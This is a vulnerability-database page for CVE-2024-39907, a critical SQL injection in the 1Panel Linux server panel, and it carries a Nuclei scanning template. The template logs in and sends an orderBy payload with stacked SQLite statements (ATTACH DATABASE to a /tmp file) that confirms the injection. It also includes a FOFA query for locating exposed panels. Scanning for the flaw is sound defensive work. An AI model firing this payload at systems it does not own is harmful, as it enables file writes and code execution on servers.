Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-39907HistoryJul 30, 2024 - 9:14 a.m.
1Panel SQL Injection - Authenticated
2024-07-3009:14:30
ProjectDiscovery
github.com
8
cve
cve2024
sqli
1panel
authenticated
linux
server
management
panel
arbitrary
file
writes
rce
web-based
sql
injection
project
filtered
upgrade.
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
7.3
Confidence
High
EPSS
0.006
Percentile
79.5%
1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
id: CVE-2024-39907
info:
name: 1Panel SQL Injection - Authenticated
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
reference:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39907
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09387
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
tags: cve,cve2024,sqli,1panel,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/auth/login HTTP/1.1
Host: {{Hostname}}
EntranceCode: ZW50cmFuY2U=
Content-Type: application/json
{"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}
- |
POST /api/v1/hosts/command/search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_2, "SQL logic error","table exp already exists")
- contains(header_1, 'psession')
condition: and
# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950Related
osv
osv
gitlab
gitlab
1Panel has an SQL injection issue related to the orderBy clause
2024-07-18 00:00:00
vulnrichment
vulnrichment
CVE-2024-39907 a sqlinjection in 1Panel
2024-07-18 15:31:30
veracode
veracode
SQL Injection
2024-07-22 17:22:25
cve
cve
CVE-2024-39907
2024-07-18 16:15:07
cvelist
cvelist
CVE-2024-39907 a sqlinjection in 1Panel
2024-07-18 15:31:30
nvd
nvd
CVE-2024-39907
2024-07-18 16:15:07
github
github
1Panel has an SQL injection issue related to the orderBy clause
2024-07-18 14:25:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
7.3
Confidence
High
EPSS
0.006
Percentile
79.5%
Related for NUCLEI:CVE-2024-39907